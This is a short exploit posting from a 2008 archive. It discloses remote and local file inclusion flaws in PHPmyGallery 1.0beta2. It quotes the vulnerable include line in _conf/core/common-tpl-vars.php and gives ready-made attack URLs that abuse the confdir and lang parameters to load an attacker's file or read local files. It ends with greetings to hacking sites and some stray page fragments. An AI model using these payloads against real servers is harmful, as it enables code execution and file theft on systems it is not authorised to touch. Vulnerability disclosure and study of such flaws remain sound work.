PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities :

Date : 2008-12-09 Author : ZoRLu
[~] PHPmyGallery v~1.0beta2 RFi/LFi Multiple Remote Vuln.
[~]
[~] download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.0beta2.zip
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Date: 08/12/2008
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

file:

_conf/core/common-tpl-vars.php

c0de:

require($confdir.'lang/langpack.'.$lang.'.php');  ( line 23 )

rfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?

lfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-09]

C1

 

C2

 

C3